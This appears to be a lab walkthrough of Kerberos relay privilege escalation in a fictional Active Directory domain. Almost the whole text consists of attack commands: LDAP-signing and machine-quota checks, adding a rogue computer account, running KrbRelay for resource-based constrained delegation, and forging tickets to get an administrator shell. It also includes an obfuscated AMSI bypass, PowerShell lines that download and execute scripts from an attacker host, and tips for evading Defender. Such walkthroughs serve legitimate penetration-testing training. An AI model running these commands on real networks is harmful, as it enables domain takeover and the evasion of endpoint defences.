Another very useful technic to escalate privileges is kerberos relay, like implemented in
As KrbRelayUp is detected by defender, we will use the step by step approach like by @an0n_r0, using @cube0x0
At the time of writing KrbRelay is not detected by defender.
The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :
Copy crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
Add computer and RBCD
To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module
Copy crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
Add computer :
Copy addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
Get the SID of that computer:
From windows
Copy $o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
From Linux
Copy lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
Copy powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
Check ports
xrdp
Copy xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
Copy PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
Launch krbrelay
CLISID: CIeAxiInstallerService Class
Copy https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
Copy PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
Now we finish with RBCD exploitation
From Linux Impacket :
Copy getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local
C:\>whoami
north\administrator
with Rubeus from Windows
Copy $x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:
Copy .\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
With other methods